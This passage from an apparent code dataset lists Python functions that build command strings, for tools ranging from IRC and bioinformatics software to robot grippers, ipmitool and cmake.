print(code_command)\n raise ValueError()", "def _build_command_prelude(class_number, verb):\n return struct.pack(\"<II\", class_number, verb)", "def _cmd_builder(self, test_config):\n arg_str = ''\n for key, value in sorted(test_config['args'].items()):\n arg_str += '--{} {} '.format(key, value)\n return test_config['pycmd'].format(arg_str)", "def _create_cmd(self):\n comment = (\"#------------------\\n\"\n \"# Install FSL {}\\n\"\n \"#------------------\".format(self.version))\n if self.use_binaries:\n url = self._get_binaries_url()\n cmd = self.install_binaries(url)\n elif self.use_installer:\n cmd = self.install_with_pyinstaller(self.check_urls)\n return \"\\n\".join((comment, cmd))", "def build(self, origin, token, args):\r\n # If the last argument is \"long\", package it for sending\r\n if len(args) > 0:\r\n if args[-1].find(\" \") > -1:\r\n build_last_arg = \":\" + args[-1]\r\n build_args = args[0:-1] + build_last_arg.split(\" \")\r\n else:\r\n build_args = args\r\n else:\r\n build_args = []\r\n # Build the line\r\n # Future compatibility - only send \\n\r\n ret = create_numeric(origin) + \" \" + token + \" \" \\\r\n + \" \".join(build_args) + \"\\n\"\r\n \r\n # Check we're not sending things which are protocol violations\r\n if len(ret) > 512:\r\n raise ProtocolError('Line too long to send')\r\n if not token.isupper() and not token.isdigit():\r\n raise ProtocolError('Command not in uppercase during build')\r\n \r\n return ret", "def __build_cmd(self, infname, outdir):\n self._outdirname = os.path.join(outdir, \"trimmomatic_output\")\n cmd = [\"trimmomatic\",\n infname,\n \"-o\", self._outdirname]\n self._cmd = ' '.join(cmd)", "def command_and_args(self) -> str:\n if self.command and self.args:\n rtn = f'{self.command} {self.args}'\n elif self.command:\n # there were no arguments to the command\n rtn = self.command\n else:\n rtn = ''\n return rtn", "def cmdify(self):\n return \" \".join(\n itertools.chain(\n [_quote_if_contains(self.command, r\"[\\s^()]\")],\n (_quote_if_contains(arg, r\"[\\s^]\") for arg in self.args),\n )\n )", "def _get_cmd(cls, command, f_config, verbose=False):\n if command not in cls.COMMANDS:\n raise KeyError('Could not recongize command \"{}\". 
'\n 'Available commands are: {}'\n .format(command, cls.COMMANDS))\n cmd = cls.CMD_BASE.format(fp_config=f_config, command=command)\n if verbose:\n cmd += ' -v'\n\n return cmd", "def command(self):\n return (self.command_).format(self.x)", "def cmd(self):", "def genCommand(char, command): \n \n if char == 'a':\n command = SModelRobotOutput();\n command.rACT = 1\n command.rGTO = 1\n command.rSPA = 255\n command.rFRA = 150\n\n if char == 'r':\n command = SModelRobotOutput();\n command.rACT = 0\n\n if char == 'c':\n command.rPRA = 255\n\n if char == 'o':\n command.rPRA = 0\n\n if char == 'b':\n command.rMOD = 0\n \n if char == 'p':\n command.rMOD = 1\n \n if char == 'w':\n command.rMOD = 2\n \n if char == 's':\n command.rMOD = 3\n\n #If the command entered is a int, assign this value to rPRA\n try: \n command.rPRA = int(char)\n if command.rPRA > 255:\n command.rPRA = 255\n if command.rPRA < 0:\n command.rPRA = 0\n except ValueError:\n pass \n \n if char == 'f':\n command.rSPA += 25\n if command.rSPA > 255:\n command.rSPA = 255\n \n if char == 'l':\n command.rSPA -= 25\n if command.rSPA < 0:\n command.rSPA = 0\n\n \n if char == 'i':\n command.rFRA += 25\n if command.rFRA > 255:\n command.rFRA = 255\n \n if char == 'd':\n command.rFRA -= 25\n if command.rFRA < 0:\n command.rFRA = 0\n\n return command", "def gen_build_str_def():\n\treturn \"\"", "def GenerateABCmd(self):\n \n\treturn self.ABGlobal.JavaPath + self.ABGlobal.ABJar + \"; ab.Ab \" + \" -ipServer \"+ self.ABGlobal.ServerIP + \" -ip \" + self.BadgeIP \\\n\t + \" -cmd \" + self.ABGlobal.TemABFile + \" -out \" + self.AbLogName + \" -dir \" + self.ABGlobal.ABHome + \" -log 5 -wavdir \" + \\\n\t self.ABGlobal.WavDirPATH + self.ABGlobal.ApMac + \" -mac \"+self.DeviceMac+\" -rtp \" # \" -logout\" ", "def genCommand(self,char, command): \n\t\t\n\t\tif char == 'a':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 1\n\t\t\tcommand.rGTO = 1\n\t\t\tcommand.rSP = 255\n\t\t\tcommand.rFR = 150\n\n\t\tif char == 'r':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 0\n\n\t\tif char == 'c':\n\t\t\tcommand.rPR = 255\n\n\t\tif char == 'o':\n\t\t\tcommand.rPR = 0 \n\n\t\t#If the command entered is a int, assign this value to rPRA\n\t\ttry: \n\t\t\tcommand.rPR = int(char)\n\t\t\tif command.rPR > 255:\n\t\t\t\tcommand.rPR = 255\n\t\t\tif command.rPR < 0:\n\t\t\t\tcommand.rPR = 0\n\t\texcept ValueError:\n\t\t\tpass \n\t\t\t\n\t\tif char == 'f':\n\t\t\tcommand.rSP += 25\n\t\t\tif command.rSP > 255:\n\t\t\t\tcommand.rSP = 255\n\t\t\t\t\n\t\tif char == 'l':\n\t\t\tcommand.rSP -= 25\n\t\t\tif command.rSP < 0:\n\t\t\t\tcommand.rSP = 0\n\n\t\t\t\t\n\t\tif char == 'i':\n\t\t\tcommand.rFR += 25\n\t\t\tif command.rFR > 255:\n\t\t\t\tcommand.rFR = 255\n\t\t\t\t\n\t\tif char == 'd':\n\t\t\tcommand.rFR -= 25\n\t\t\tif command.rFR < 0:\n\t\t\t\tcommand.rFR = 0\n\n\t\treturn command", "def _build_cmdline (self, *clargs):\n\t\t#MSG (clargs)\n\t\tclargs = list (clargs) + [INSEQ_FILENAME]\n\t\t#MSG (clargs)\n\t\tcmdline = clineapp.ClineApp._build_cmdline (self, *clargs)\n\t\tcmdline += ' > %s' % OUTALIGN_FILENAME\n\t\t#MSG (cmdline)\n\t\treturn cmdline", "def compile(self) -> str:\n compiled_command = (\n f\"{PUMP_ADDRESS[self.target_pump_num]}\"\n f\"{self.target_syringe}\"\n f\"{self.command}{self.command_value}\"\n )\n\n if self.parameter_value:\n compiled_command += f\"{self.optional_parameter}{self.parameter_value}\"\n\n return compiled_command + self.execution_command", "def buildCommand(self, player, 
game, json):", "def build(_):", "def rebuild_command(args):\n return \"%s\\n\" % (\" \".join(args)).replace(\"\\\\\", \"\\\\\\\\\")", "def label(cmd):\r\n cmd = cmd.replace('make][.DP', 'make1][.NP')\r\n cmd = cmd.replace('make][.SC', 'make2][.SC')\r\n cmd = re.sub('(draw.*)one','\\\\1one1',cmd)\r\n cmd = re.sub('(make1.*)one','\\\\1one1',cmd)\r\n cmd = re.sub('(make2.*)one','\\\\1one2',cmd)\r\n cmd = re.sub('(move.*)one','\\\\1one2',cmd)\r\n cmd = re.sub('(hide.*)one','\\\\1one2',cmd)\r\n cmd = '[result ' + cmd + ']' #dummy function for plop\r\n return cmd", "def _commandTemplate(self, command:dict) -> ET.Element:\n\t\tresult = ET.Element('Command')\n\t\tfor key,value in command.items():\n\t\t\tET.SubElement(result,key).text = value\n\t\treturn result", "def gen_build_str_dec():\n\t#Get name of person building firmware\n\t#git config --get-all user.name\n\t#Get repo revision\n\t#git log | head -1 | cut -d \" \" -f 2\n\t#Get branch\n\t#git branch | grep \"\\*\" | cut -d \" \" -f 2\n\t#Get modified status\n\t#Date, time, gcc version (__VERSION__)\n\ts = \"Miniboard Firmware rev \"\n\treturn \"\"", "def build_message(cmd, data):\r\n\tif len(cmd) > CMD_FIELD_LENGTH or len(data) > MAX_DATA_LENGTH:\r\n\t\treturn None\r\n\tfull_cmd = cmd + \" \"*(CMD_FIELD_LENGTH-len(cmd))\r\n\tdata_len = str(len(data))\r\n\tfull_data_len = \"0\"*(LENGTH_FIELD_LENGTH-len(data_len))+data_len\r\n\tfull_msg = DELIMITER.join([full_cmd, full_data_len, data])\r\n\treturn full_msg", "def __build_command_string(self, cmd):\n cmd_string = cmd.command\n\n # if we know the number of frames that this command returns,\n # only wait for exactly that number. This avoids some harsh\n # timeouts from the ELM, thus speeding up queries.\n\n\n return cmd_string", "def build_command_depricated(device_dict, command_tuple):\n command = \" \" # The final command which should be send in the end\n return_list = [] # Is list of commands which can be returned if need be\n only_command = False # Flag if only a command was passed, important if such a command doesnt need syntax!\n\n if (\n type(command_tuple) == type(u\"Unicode\")\n or type(command_tuple) == str\n or type(command_tuple) == float\n or type(command_tuple) == int\n ):\n command_tuple = (str(command_tuple), \"\") # so only tuple are now prevelent\n only_command = True\n elif type(command_tuple[1]) == list:\n command_tuple = (\n command_tuple[0],\n [str(x) for x in command_tuple[1]],\n ) # so no unicode is present\n\n # Preparations\n # look for a syntax (paranteses and so on)\n if \"syntax\" in device_dict:\n syntax = str(device_dict[\"syntax\"])\n syntax = syntax.split(\"###\")\n if not syntax[0]:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n else:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n\n # Looks if a separator is needed to sepatare mulitple orders\n if \"separator\" in device_dict:\n sepa = str(device_dict[\"separator\"])\n else:\n sepa = \" \" # This should be the standard for most devices\n\n if command_tuple[0] in device_dict:\n # here all the magic happens\n # First look if the order is swichted or not (command value, or value command)\n\n # Check if multiple commands so list or so\n if type(device_dict[command_tuple[0]]) == str or type(\n device_dict[command_tuple[0]]\n ) == type(u\"Unicode\"):\n command_list = [device_dict[command_tuple[0]]]\n else:\n command_list = device_dict[command_tuple[0]]\n\n for command_item in command_list:\n command_item = str(command_item)\n command = \"\"\n\n # Value -> Command\n 
if int(device_dict.get(\"command_order\", 1)) == -1:\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.error(\n \"Warning: Not enough parameters passed for function: \"\n + str(command_item)\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! 
Inserted 0 instead.\"\n )\n command += \"0\" + sepa\n\n command = command.strip(\" \").strip(\",\") # to get rid of last comma\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = syntax[1] + str(item) + \" \" + command_item\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If only a command was passed\n string = str(command_tuple[1])\n command += syntax[1] + str(string).strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # command += \" \" + str(device_dict[str(command_item)]).strip() + syntax[0] # adds the order to the command\n command += (\n \" \" + str(command_item).strip() + syntax[0]\n ) # adds the order to the command\n # Add a command terminator if one is needed and the last part of the syntax\n command = command.strip()\n command += device_dict.get(\"execution_terminator\", \"\")\n # command += syntax[0] # adds the order to the command\n return_list.append(command)\n\n # Command -> Value\n else:\n command += (\n str(command_item).strip() + \" \" + syntax[0]\n ) # adds the order to the command\n\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa + \" \"\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.warning(\n \"Not enough parameters passed for function: \"\n + str(command_tuple[0])\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! 
Inserted 0 instead.\"\n )\n command += \" \" + \"0\" + sepa\n\n command = command.strip(\" \").strip(\n \",\"\n ) # to get rid of last comma and space at the end if csv\n command += syntax[1]\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = str(item) + \" \" + command_item + syntax[1]\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If its just one value or no value\n string = str(command_tuple[1])\n command += string.strip() + syntax[1]\n command = command.strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command.strip())\n else:\n # If the command is not found in the device only command tuple will be send\n l.error(\n \"Command \"\n + str(command_tuple[0])\n + \" was not found in device! Unpredictable behavior may happen. No commad build!\"\n )\n return \"\"\n\n # Add a command terminator if one is needed and the last part of the syntax\n # command += device_dict.get(\"execution_terminator\",\"\")\n\n # Todo: multiple commands return\n if len(return_list) > 1:\n return return_list\n else:\n return str(return_list[0])", "def cmd(self, cmd):\n return cmd", "def post_command(self) -> str:\n rtn = ''\n if self.terminator:\n rtn += self.terminator\n\n if self.suffix:\n rtn += ' ' + self.suffix\n\n if self.pipe_to:\n rtn += ' | ' + self.pipe_to\n\n if self.output:\n rtn += ' ' + self.output\n if self.output_to:\n rtn += ' ' + self.output_to\n\n return rtn", "def get_command(self, kword: str):\n # Step Zero is to make sure that the name does not belong to a REAL command.\n zero, mod = super().get_command(kword)\n if zero:\n return zero, mod\n\n # Otherwise, first, ensure that the keyword does in fact exist in the custom list.\n command = self.config.commands.get(kword, None)\n if not command:\n return None, None\n response = command[\"com\"]\n\n # Build the function to return the response. 
Note that \"self\" exists already.\n async def cmd_custom(args, src, **_):\n if args:\n member = self.get_member(src, args[0].strip())\n tag = member.mention if member else None\n else:\n tag = None\n\n nsfw = command.get(\"nsfw\", False)\n if nsfw and src.channel.id not in self.config.get(\"nsfwChannels\"):\n return None\n\n # Replace tags where needed.\n try:\n output = response.format(\n self=src.author.name,\n myID=src.author.id,\n tag=tag or src.author.mention,\n )\n except KeyError:\n return None\n else:\n return output\n\n # Specify the docstring and name so that !help will work on this.\n short = response.replace(\"{\", \"{{\").replace(\"}\", \"}}\")\n if len(short) > 80:\n short = short[:77] + \"...\"\n cmd_custom.__doc__ = (\n \"__Custom command__: Return the following text: ```{}```\\n\\n\".format(short)\n + command.get(\n \"desc\",\n \"This is a custom command, so available help text is limited, but at the same time, the command is very simple. All it does is return a string, although the string may include formatting tags for invoker name, invoker ID, and a targeted mention.\",\n )\n + \"\\n\\nSyntax: `{p}\"\n + kword.lower()\n + (\" <user_ID>\" if \"{tag}\" in response else \"\")\n + \"`\"\n )\n cmd_custom.__name__ = \"cmd_\" + kword.lower()\n\n return cmd_custom, None", "def build_command_line( self, job ):\n commands = job.get_command_line()\n # All job runners currently handle this case which should never\n # occur\n if not commands:\n return None\n return commands", "def build():", "def label(cmd):\n cmd = cmd.replace('make][.DP', 'make1][.NP')\n cmd = cmd.replace('make][.SC', 'make2][.SC')\n cmd = re.sub('(draw.*)one','\\\\1one1',cmd)\n cmd = re.sub('(make1.*)one','\\\\1one1',cmd)\n cmd = re.sub('(make2.*)one','\\\\1one2',cmd)\n cmd = re.sub('(move.*)one','\\\\1one2',cmd)\n cmd = re.sub('(hide.*)one','\\\\1one2',cmd)\n cmd = '[result ' + cmd + ']' #dummy function for plop\n return cmd", "def build_commands(self):\r\n for tag in self.bmark.tags.keys():\r\n # if this tag is a command then return true\r\n if tag in COMMANDLIST:\r\n self.commands.append(tag)", "def __init__(self, cmd):\n # Build command + options \n self.cmd = cmd \n setattr(self, 'command', \"%s\" % (cmd))", "def bowtie_build_cmd(fasta,ebwt_basename):\n build_index_cmd = Command(\"bowtie-build\",\n \"-f\",fasta,\n ebwt_basename)\n return build_index_cmd", "def __getFullCommandName(self, command, type):\n return 'cmd_%s_%s' % (type, command)", "def _build_setup_command(self, cmd, unit):\n # use defaults - in the future, may consider making some of these parameters\n # byte 0\n channel_address = unit\n # byte 1\n line_feed = self._param_dict.format(Parameter.LINEFEED)\n parity_type = self._param_dict.format(Parameter.PARITY_TYPE)\n parity_enable = self._param_dict.format(Parameter.PARITY_ENABLE)\n extended_addressing = self._param_dict.format(Parameter.EXTENDED_ADDRESSING)\n baud_rate = self._param_dict.format(Parameter.BAUD_RATE)\n baud_rate = getattr(BaudRate, 'BAUD_%d' % baud_rate, BaudRate.BAUD_9600)\n # byte 2\n alarm_enable = self._param_dict.format(Parameter.ALARM_ENABLE)\n low_alarm_latch = self._param_dict.format(Parameter.LOW_ALARM_LATCH)\n high_alarm_latch = self._param_dict.format(Parameter.HIGH_ALARM_LATCH)\n rtd_wire = self._param_dict.format(Parameter.RTD_4_WIRE)\n temp_units = self._param_dict.format(Parameter.TEMP_UNITS)\n echo = self._param_dict.format(Parameter.ECHO)\n delay_units = self._param_dict.format(Parameter.COMMUNICATION_DELAY)\n # byte 3\n precision = 
self._param_dict.format(Parameter.PRECISION)\n precision = getattr(UnitPrecision, 'DIGITS_%d' % precision, UnitPrecision.DIGITS_6)\n large_signal_filter_constant = self._param_dict.format(Parameter.LARGE_SIGNAL_FILTER_C)\n large_signal_filter_constant = filter_enum(large_signal_filter_constant)\n small_signal_filter_constant = self._param_dict.format(Parameter.SMALL_SIGNAL_FILTER_C)\n small_signal_filter_constant = filter_enum(small_signal_filter_constant)\n\n # # Factory default: 0x31070182\n # # Lab default: 0x310214C2\n\n byte_0 = int(channel_address.encode(\"hex\"), 16)\n log.debug('byte 0: %s', byte_0)\n byte_1 = \\\n (line_feed << 7) + \\\n (parity_type << 6) + \\\n (parity_enable << 5) + \\\n (extended_addressing << 4) + \\\n baud_rate\n log.debug('byte 1: %s', byte_1)\n byte_2 = \\\n (alarm_enable << 7) + \\\n (low_alarm_latch << 6) + \\\n (high_alarm_latch << 5) + \\\n (rtd_wire << 4) + \\\n (temp_units << 3) + \\\n (echo << 2) + \\\n delay_units\n log.debug('byte 2: %s', byte_2)\n byte_3 = \\\n (precision << 6) + \\\n (large_signal_filter_constant << 3) + \\\n small_signal_filter_constant\n log.debug('byte 3: %s', byte_3)\n\n setup_command = '#%sSU%02x%02x%02x%02x' % (unit[0], byte_0, byte_1, byte_2, byte_3) + NEWLINE\n log.debug('default setup command (%r) for unit %02x (%s)' % (setup_command, byte_0, unit[0]))\n return setup_command", "def build_command(device, command_tuple, single_commands=False):\n if isinstance(command_tuple, (str)):\n command_tuple = (command_tuple, \"\") # make da dummy command\n\n if command_tuple[0] in device:\n\n if isinstance(device[command_tuple[0]], dict):\n try:\n com = device[command_tuple[0]][\"command\"]\n except:\n l.error(\n \"Dict command structure recognised but no actual command found for passed order {}\".format(\n command_tuple\n ),\n exc_info=True,\n )\n return None\n else:\n com = device[command_tuple[0]]\n\n if isinstance(command_tuple[1], (str, float, int)):\n try:\n return com.format(command_tuple[1])\n except IndexError:\n l.error(\n \"You attempted to send a command with the wrong number of parameters the command structure is: {}\"\n \" but you passed: [{}] as parameter(s)\".format(\n com, command_tuple[1]\n ),\n exc_info=True,\n )\n\n elif single_commands:\n if isinstance(command_tuple[1], list) or isinstance(\n command_tuple[1], tuple\n ):\n return [com.format(single) for single in command_tuple[1]]\n else:\n l.error(\"In order to build a list command, a list has to be passed!\")\n return None\n\n elif isinstance(command_tuple[1], list) or isinstance(command_tuple[1], tuple):\n # Find occurance of {} in string if list is as long as occurance of {} then just pass otherwise join a string\n brackets_count = device[command_tuple[0]].count(\"{}\")\n if len(command_tuple[1]) == brackets_count:\n return com.format(*command_tuple[1])\n elif brackets_count == 1 and len(command_tuple[1]) > brackets_count:\n sep = device.get(\"separator\", \" \")\n return com.format(sep.join([str(x) for x in command_tuple[1]]))\n elif (\n len(command_tuple[1]) > brackets_count\n or len(command_tuple[1]) < brackets_count\n and brackets_count != 1\n ):\n l.error(\n \"Could not build command for input length {}\"\n \" and input parameters length {}. 
Input parameters must be of same length\"\n \" as defined in config or 1\".format(\n len(command_tuple[1]), brackets_count\n )\n )\n return None\n else:\n l.error(\n \"Could not find command {} in command list of device: {}\".format(\n command_tuple[0], device[\"Device_name\"]\n )\n )", "def MakeCommand(base_cmd, outpath, filename):\n basename = os.path.basename(filename)\n out = os.path.join(outpath, os.path.splitext(basename)[0] + '.obj')\n return (base_cmd + ['-c', filename, '-o', out], basename)", "def _gen_cmd(cmd, address):\n family = {4: 'inet', 6: 'inet6'}[address[0].version]\n args = ['addr', cmd, '%s/%s' % (address[0], address[1])]\n if family == 'inet' and cmd == 'add':\n args += ['brd', '+']\n args += ['dev', real_ifname]\n if family == 'inet6':\n args = ['-6'] + args\n return args", "def build(c):", "def __generate_usage_string(self):\n usage = \"{} <command> [<args>]\\n\\n\" \\\n \"Available commands:\\n\".format(self.name)\n max_name_length = len(max(self.cmd_list, key=lambda x: len(x[0]))[0])\n for name, desc in self.cmd_list:\n name_spacing = \" \" * (max_name_length - len(name)) + \" \" * 5\n usage += \" {}{}{}\\n\".format(name, name_spacing, desc)\n\n return usage", "def create_cmd(self, out_log, err_log):\n instructions_list = []\n\n # executable path\n instructions_list.append(self.reduce_path)\n\n if self.flip: instructions_list.append('-FLIP')\n if self.noflip: instructions_list.append('-NOFLIP')\n if self.nuclear: instructions_list.append('-NUClear')\n if self.nooh: instructions_list.append('-NOOH')\n if self.oh: instructions_list.append('-OH')\n if self.his: instructions_list.append('-HIS')\n if self.noheth: instructions_list.append('-NOHETh')\n if self.rotnh3: instructions_list.append('-ROTNH3')\n if self.norotnh3: instructions_list.append('-NOROTNH3')\n if self.rotexist: instructions_list.append('-ROTEXist')\n if self.rotexoh: instructions_list.append('-ROTEXOH')\n if self.allalt: instructions_list.append('-ALLALT')\n if self.onlya: instructions_list.append('-ONLYA')\n if self.charges: instructions_list.append('-CHARGEs')\n if self.dorotmet: instructions_list.append('-DOROTMET')\n if self.noadjust: instructions_list.append('-NOADJust')\n if self.build: instructions_list.append('-BUILD')\n\n instructions_list.append(self.input_path)\n instructions_list.append('>')\n instructions_list.append(self.output_path)\n\n return instructions_list", "def create_command(command: str, *parameters) -> str:\n if parameters and isinstance(parameters, tuple) and isinstance(parameters[0], tuple):\n parameters = parameters[0]\n str_param: str = ' '.join([str(param) for param in parameters]) if parameters else \"\"\n result = command+' ' + str_param + '\\r\\n' if str_param else command + '\\r\\n'\n return result", "def create_cmd(dotfile, pngfile):\n dot = DOT\n DOT_CMD_INDX = 0\n DOT_FILE_INDX = 2\n PNGF_FILE_INDX = 4\n cmd = CMD_LIST[:]\n cmd[DOT_CMD_INDX] = dot\n cmd[DOT_FILE_INDX] = f\"{dotfile}\"\n cmd[PNGF_FILE_INDX] = f\"{pngfile}\"\n return cmd", "def makeLabel(self, cmd):\n if cmd.type in ['Function', 'Call']:\n return cmd.arg1\n\n if self.current_function_name is not None:\n prefix = self.current_function_name\n else:\n prefix = self.ns\n return prefix + '$' + cmd.arg1", "def _generate_add_user_command(self):\n args = self._add_user()\n #Create command string\n command = \"add_user {0} {1} {2}\".format(args[\"userID\"], args[\"name\"], args[\"webhook_url\"])\n if args[\"override\"]:\n command += \" override {0} {1} {2}\".format(args[\"overrideUserID\"], 
args[\"overrideUser\"], args[\"overrideOauth\"])\n if args[\"blacklist\"] != \"\":\n command += \" {0}\".format(args[\"blacklist\"])\n command += \"\\r\\n\"\n return(command)", "def test_cmd_builder(self):\n test_conf = '/tmp/test'\n expected_cmd = ['calabar_vpnc', test_conf]\n\n cmd = self.t._build_cmd(test_conf, None)\n self.assertTrue(cmd, expected_cmd)", "def build_command(self, args):\n self._validate_common(args)\n self._set_manifests(args)\n\n manifest = self._manager._recipes\n\n records = self._get_matching_records(args, manifest)\n\n if not len(records):\n sys.exit(\"No matching items found.\")\n\n for record in records:\n result = self._manager.build(record['_type'], **record)\n print('The requested asset has been built: {}'.format(result['_path']))\n\n if len(records) > 1:\n print('All files have been successfully built. Thank you.')", "def shell_command(self):\n # TODO: fix this naive version by adding quotes where appropriate\n return \" \".join(self.args)", "def command(self) -> str:\n cmd = ''\n if self.argv:\n cmd = self.argv[0]\n return cmd", "def makeCommands(f0,psi0,th,logFileName,mat,fnyld,fnhrd):\n from mk.library.lib import gen_tempfile\n stdoutFileName = gen_tempfile(\n prefix='stdout-mkrun')\n # stdoutFileName ='/tmp/dump'\n\n cmd = 'python main.py --fn %s -f %5.4f -p %+6.1f -t %+7.2f --fnyld %s --fnhrd %s '%(\n logFileName,f0,psi0,th,fnyld,fnhrd)\n\n if mat!=-1:\n cmd = cmd + ' --mat %i'%mat\n cmd = cmd + ' > %s'%stdoutFileName\n print 'cmd:',cmd\n return cmd", "def genCMakeCmd(self):\n \n cmd = \"cmake -C \" + self.parent.env[\"ILCSOFT_CMAKE\"] + \" \"\n for k, v in self.envcmake.iteritems():\n cmd = cmd + \"-D\" + k + \"=\\\"\" + str(v).strip() + \"\\\" \"\n\n cmd += self.installPath\n\n return cmd.strip()", "def command_short():\n pass", "def build_command(args, parser):\n cmd = \"ipmitool -I lanplus\"\n if not args.host:\n print \"\\nERROR: hostname is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -H ' + args.host\n if args.port:\n cmd += ' -p ' + args.port\n if not args.user:\n print \"\\nERROR: username is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -U ' + args.user\n if args.passwd:\n cmd += ' -P ' + args.passwd\n cmd += ' dcmi power reading'\n if args.interval:\n global INTERVAL\n INTERVAL = args.interval\n if args.nread:\n global NREAD\n NREAD = args.nread\n else:\n global INFINITY\n INFINITY = True\n if args.store:\n global STORE\n STORE = True\n return cmd", "def __str__(self):\n if not self._args and not self.subcommand:\n return self.cmd\n elif not self._args and self.subcommand:\n return '{} {}'.format(\n self.cmd, self.subcommand)\n elif self._args and not self.subcommand:\n return '{} {}'.format(\n self.cmd, ' '.join(self._args))\n else:\n return '{} {} {}'.format(\n self.cmd, self.subcommand, ' '.join(self._args))", "def _build_robovac_command(mode, command):\n mcu_ota_header_0xa5 = 0xA5\n cmd_data = (mode.value + command.value)\n\n return bytes([mcu_ota_header_0xa5, mode.value, command.value, cmd_data, 0xFA])", "def _get_command_args_syntax_help_string(command, is_no_command, args):\n syntax_string = ''\n if args:\n for i, arg in enumerate(args):\n if i > 0:\n syntax_string += ' '\n \n if _is_string(arg):\n syntax_string += arg\n continue\n\n if type(arg) == tuple:\n if debug.description():\n print _line(), command['self'], arg\n\n if is_no_command:\n optional = arg.get('optional-for-no', False)\n else:\n optional = arg.get('optional', False)\n if optional:\n syntax_string += '['\n \n choices = 
